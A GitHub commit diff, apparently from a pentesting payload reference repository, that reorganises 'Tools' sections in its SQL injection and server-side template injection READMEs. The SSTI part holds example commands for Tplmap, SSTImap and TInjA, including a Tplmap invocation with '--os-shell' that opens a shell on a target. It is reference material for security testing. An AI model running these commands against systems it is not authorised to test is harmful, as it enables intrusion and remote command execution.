Tools Update

swisskyrepo · Jan 21, 2024 · 97cfeee · 97cfeee
1 parent 12c6531
commit 97cfeee
Show file tree

Hide file tree

Showing 2 changed files with 27 additions and 31 deletions.
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
@@ -46,6 +46,12 @@ Attempting to manipulate SQL queries may have goals including:
   * [Case modification](#case-modification)
 
 
+## Tools
+
+* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
+* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
+
+
 ## Entry point detection
 
 Detection of an SQL injection entry point

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
@@ -82,44 +82,34 @@
   - [PHP - Plates](#plates)
   - [References](#references)
 
-## Tools
-
-Recommended tools: 
-
-[TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots
-
-e.g:
-
-```bash
-tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
-tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
-```
-
-[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
-
-e.g:
 
-```powershell
-python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
-python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
-python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
-```
-
-[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap)
+## Tools
 
-e.g:
-
-```powershell
-python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
-python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
-python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
-```
+* [TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots
+  ```bash
+  tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
+  tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
+  ```
+
+* [Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
+  ```powershell
+  python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
+  python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
+  python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
+  ```
+
+* [SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap)
+  ```powershell
+  python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
+  python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
+  python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
+  ```
 
 ## Methodology
 
 ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
 
----
+
 ## Detection
 
 In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability :